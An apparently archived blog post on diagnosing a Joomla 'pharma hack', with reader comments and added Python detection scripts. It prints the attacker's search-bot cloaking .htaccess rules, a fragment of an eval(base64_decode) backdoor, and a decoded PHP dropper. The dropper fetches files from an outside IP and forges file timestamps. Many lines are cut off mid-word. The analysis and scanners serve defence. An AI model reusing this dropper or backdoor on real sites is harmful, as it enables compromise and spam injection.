http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
Internet Thoughts
One of the more CSI type things I get to do in my job is figure out how servers a uring out why a site was listing Pharmaceuticals in Google results. I've dealt a lot with hacked and compromised servers, but have never come acro Basically, 3 modified files kept appearing on the server, a modified .htaccess file What we discovered was the following in the .htaccess file:

    #Apache search queries statistic module
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|craw
    RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|
    RewriteCond %{REQUEST_URI} /$ [OR]
    RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|p
    RewriteCond %{REQUEST_FILENAME} !common.php
    RewriteCond %{DOCUMENT_ROOT}/common.php -f
    RewriteRule ^.*$ /common.php [L]
    </IfModule>

What this means is that any search bot will get redirected through common.php. that modified page meta descriptions and titles. This is outlined pretty well here: macy-hack.html. However, we deleted these files and modified the .htaccess file back to its origin big question was how? I did a search through the Joomla source for base64_encode/decode and found or core, but I did find a few that looked a little odd. For example:

    /**GnPvQdChUa*/if((md5($_REQUEST["img_id"])=="ae6d32585e
Basically what this does is run whatever is passed in the $_REQUEST["mod_co any base64_encoded string will be run as is. At 6:22 on a sunny Saturday morning, I got a notification from one of my monito
1 de 6
08/09/2013 8:21
http://petetasker.wordpress.com/2012/07/23/joomla-pharma-hack/
back! I checked the logs and sure enough, here is what the request was:
/components/com_users/users.php?img_id=1f3870be274f6c
That param decodes to a lovely PHP script:

    // Stage 1: pull three pieces from the attacker's host: the doorway page,
    // an include stub and an .htaccess fragment. Falls back to file_get_contents()
    // when the curl extension is missing, so disabling curl alone does not stop it.
    if(extension_loaded("curl")){
    $ch=curl_init();
    curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/doo
    curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa
    curl_setopt($ch,CURLOPT_HEADER,0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    $door=curl_exec($ch);
    $ch=curl_init();
    curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/inc
    curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa
    curl_setopt($ch,CURLOPT_HEADER,0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    $inc_code=curl_exec($ch);
    $ch=curl_init();
    curl_setopt($ch,CURLOPT_URL,"http://209.190.20.51/inc
    curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0(compa
    curl_setopt($ch,CURLOPT_HEADER,0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    $inc_ht=curl_exec($ch);
    }else{
    $door=@file_get_contents("http://209.190.20.51/door.t
    $inc_code=@file_get_contents("http://209.190.20.51/in
    $inc_ht=@file_get_contents("http://209.190.20.51/incl
    }
    // Stage 2: pick an existing file in the web root whose mtime and permissions
    // will be copied onto the dropped files so they do not stand out in a listing.
    if(is_file("/home/user/public_html/index.html")){
    $index="/home/user/public_html/index.html";
    }
    if(is_file("/home/user/public_html/index.htm")){
    $index="/home/user/public_html/index.htm";
    }
    if(is_file("/home/user/public_html/.htaccess")){
    $index="/home/user/public_html/.htaccess";
    }
    if(is_file("/home/user/public_html/favicon.ico")){
    $index="/home/user/public_html/favicon.ico";
    }
    if(is_file("/home/user/public_html/index.php")){
    $index="/home/user/public_html/index.php";
    }
    if(is_file("/home/user/public_html/common.php")){
    $index="/home/user/public_html/common.php";
    }
    $time=filemtime($index);
    $chmod=substr(sprintf("%o",fileperms($index)),4
    $chmod=trim($chmod);
    $chmod=intval($chmod,8);
    // Stage 3: (re)write common.php and .htaccess, then restore the borrowed
    // permissions and timestamp, which is why the files kept "reappearing" unchanged.
    @unlink("/home/user/public_html/common.php");
    $fp=fopen("/home/user/public_html/common.php","w");
    fputs($fp,$door);
    fclose($fp);
    @chmod("/home/user/public_html/common.php",$chmod);
    touch("/home/user/public_html/common.php",$time);
    $htaccess=str_replace("#####INCLUDE#####",$inc_ht,$
    @unlink("/home/user/public_html/.htaccess");
    $fp=fopen("/home/user/public_html/.htaccess","w");
    fputs($fp,$htaccess);
    fclose($fp);
    @chmod("/home/user/public_html/.htaccess",$chmod);
    touch("/home/user/public_html/.htaccess",$time);
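Because the dropper copies the mtime and permissions of an existing file onto whatever it writes, timestamp-based triage such as find -newer is unreliable here; the access log is the better place to look. As an added example (not code from the post), the following parses Apache combined-format log lines, decodes any base64-looking query parameter and flags the request when the decoded text carries several of the dropper's function names. The log lines, the img_id value and the payload stub are all constructed.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Function names that together mark a dropper of the kind decoded in the post.
PHP_MARKERS = ("curl_init(", "file_get_contents(", "fopen(", "fputs(", "chmod(", "touch(", "unlink(", "eval(")
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
# Apache combined log format: client, timestamp, request line and status are all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_if_code(value):
    """Return the decoded text when a parameter is base64 hiding PHP-like code, else None."""
    value = value.replace(" ", "+")  # parse_qsl turns an unescaped '+' into a space
    if not B64_SHAPE.match(value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    if sum(marker in decoded for marker in PHP_MARKERS) < 2:
        return None
    return decoded

def triage_log(lines):
    """Return one finding per request whose query string carries an encoded PHP payload."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = decode_if_code(value)
            if decoded is not None:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"), "path": url.path,
                                 "param": name, "decoded": decoded})
    return findings

# Constructed sample log: one ordinary page view and one request shaped like the one in the post.
# The payload is a harmless stub that merely contains the dropper's function names.
_STUB = '$ch=curl_init();$fp=fopen("common.php","w");fputs($fp,curl_exec($ch));'
_ENCODED = quote(base64.b64encode(_STUB.encode()).decode())
SAMPLE_LOG = [
    '198.51.100.9 - - [21/Jul/2012:06:22:10 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Jul/2012:06:22:11 +0000] "GET /components/com_users/users.php?img_id=CONSTRUCTEDHASH&mod_content='
    + _ENCODED + ' HTTP/1.1" 200 12 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["path"], hit["param"])
        print(hit["decoded"])
```

Point it at a real log with triage_log(open("access_log")) and compare the flagged timestamps with the mtimes on the dropped files; a mismatch confirms the touch() trick.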
So there it is, a URL param that runs cURL requests to set up spam files on a s Wanted to record this so that anyone else having this issue has somewhere to lo TTFN.
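As an added example (not from the post and not Joomla's own code), here is a small scanner for the two indicators described above: .htaccess rewrite rules that fire only for search-engine user agents and route everything to a PHP file, and PHP files carrying the md5()-gated eval(base64_decode($_REQUEST[...])) backdoor. The sample .htaccess and PHP below are constructed, and the hash and parameter name in them are placeholders.

```python
import os
import re
# Rewrite conditions keyed on search-engine user agents, as in the post's .htaccess.
BOT_UA = re.compile(r"RewriteCond\s+%\{HTTP_USER_AGENT\}\s+\S*?(google|yahoo|bing|msn|aol|crawl|bot|slurp)", re.I)
# Any catch-all rewrite that lands on a PHP file with the [L] flag.
REWRITE_PHP = re.compile(r"RewriteRule\s+\S+\s+(\S+\.php)\b.*\[[^\]]*L[^\]]*\]", re.I)
# Backdoor idioms: a hidden md5()-gated password and eval() of base64 taken from request input.
MD5_GATE = re.compile(r"md5\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\[")
EVAL_B64 = re.compile(r"eval\(\s*@?base64_decode\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\[")

def scan_htaccess(text):
    """Flag rewrite rules that send search bots (but not users) to a PHP file: cloaking."""
    findings = []
    if BOT_UA.search(text):
        for m in REWRITE_PHP.finditer(text):
            findings.append(f"bot-conditional rewrite to {m.group(1)}")
    return findings

def scan_php(text):
    """Flag the md5()-gated eval(base64_decode()) pattern found in the modified Joomla file."""
    findings = []
    if EVAL_B64.search(text):
        findings.append("eval(base64_decode()) on request input")
    if MD5_GATE.search(text):
        findings.append("md5()-gated request parameter (hidden password check)")
    return findings

def scan_tree(root):
    """Walk a web root and return {path: findings} for every suspicious .htaccess or .php file."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                text = fh.read()
            hits = scan_htaccess(text) if name == ".htaccess" else scan_php(text) if name.endswith(".php") else []
            if hits:
                report[path] = hits
    return report

# Constructed samples modelled on the snippets in the post (hash and parameter names are made up).
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|aol|bing|crawler) [NC]
RewriteRule ^.*$ /common.php [L]
</IfModule>
"""
SAMPLE_PHP = '<?php /**junk*/if((md5($_REQUEST["img_id"])=="00000000000000000000000000000000")){eval(base64_decode($_REQUEST["mod_content"]));}'
```

Run scan_tree("/home/user/public_html") after cleaning up; if the report is not empty, the backdoor that re-creates the files is still there.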
This entry was posted in Code, Joomla.
8 COMMENTS
Hi I have the same on my site... search for a mod_joomla.php in my case... Which is the first file created and what is the best way to prevent this attack?
Change all your FTP, Joomla passwords and I would disable Jumi or Sourcerer Best way to prevent it is to keep Joomla patched and up to date and don't instal of.
Check out the vulnerable extensions list (http://docs.joomla.org/Vulnerable_Exte cure upload form that was included in a page using Jumi. Also, search the source code for any base64_encode() or eval() statements.
Found out that if you rename your admin folder to something other (hasn't shown up after the usual couple of hours at least). Maybe
Found the same hack on a Drupal site. Thanks for your post as it helped us to identify the pro
Looks like this has hit WordPress now, too. Instead of coockies.txt there's a folder called coo new files. After sifting through server logs, I noticed a few hacked files in my wp-themes folde stall-list-table.php and wp-admin/load-styles.php. Hacked files start with <?php and some md running wp-cron.php. I also noticed an empty folder called .logs in my root and wonder if that elsewhere). Thanks for the post, it was a good start.
Ya the site that was originally infected was moved to another webhost and thing I'm thinking it has something to do with log files as well, because even after rem file came back.
I had this same problem recently and got rid of the three files you mention at the beginning of later it is back. These files no longer exist but the problem is back. Any idea what to look for? I am not nearly as techie with the scripts and looking at logs so some good old fashioned han Many thanks, Houston